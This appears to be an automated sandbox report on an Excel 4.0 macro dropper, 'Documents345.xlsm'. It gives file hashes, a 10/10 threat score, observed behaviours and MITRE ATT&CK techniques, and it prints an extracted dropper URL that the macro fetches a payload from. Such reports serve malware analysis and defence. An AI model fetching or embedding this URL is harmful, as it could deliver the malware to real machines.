Overview

overview

10

Static

static

8

Documents345.xlsm

windows7_x64

10

Documents345.xlsm

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    file (14).zip

  • Size

    42KB

  • Sample

    210315-53bvxlw2lx

  • MD5

    f4d370880021baf70dfde2a91ade3bae

  • SHA1

    5394f14c29085e65a53227da3e8657459f3923ed

  • SHA256

    efa9ede0e366d39c3789b95fc0b4acf0577b33a72fc05bbe376b88c9a9feea09

  • SHA512

    1b4398751c565ed57b954fbf7af273bcdc1a97c641cfb9e9432fa48a1d0f9970b095510ce787fe668efed2ca6f17503b26ed55593b788e7b3a93e0e2d40d74a7

Score
10/10
macroxlm

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://vpu03jivmm03qncgx.com/index.gif

Targets

    • Target

      Documents345.xlsm

    • Size

      57KB

    • MD5

      8c9041813c83038de85079aa49f3d936

    • SHA1

      6fa687e4396b933d0b4555455b55de5b8db3baf7

    • SHA256

      c5444c7252d6e22f4a2de2168a4afeb08e1f841aeba675e6e632e2c64fcd71ca

    • SHA512

      9cf1431762f932a3bf4fd858496e4339443115676084b7b6d1f0ab206940277a3cba09c410e02232e1689dc50501286888de4ed62abc3f12ce6077bcb335b309

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks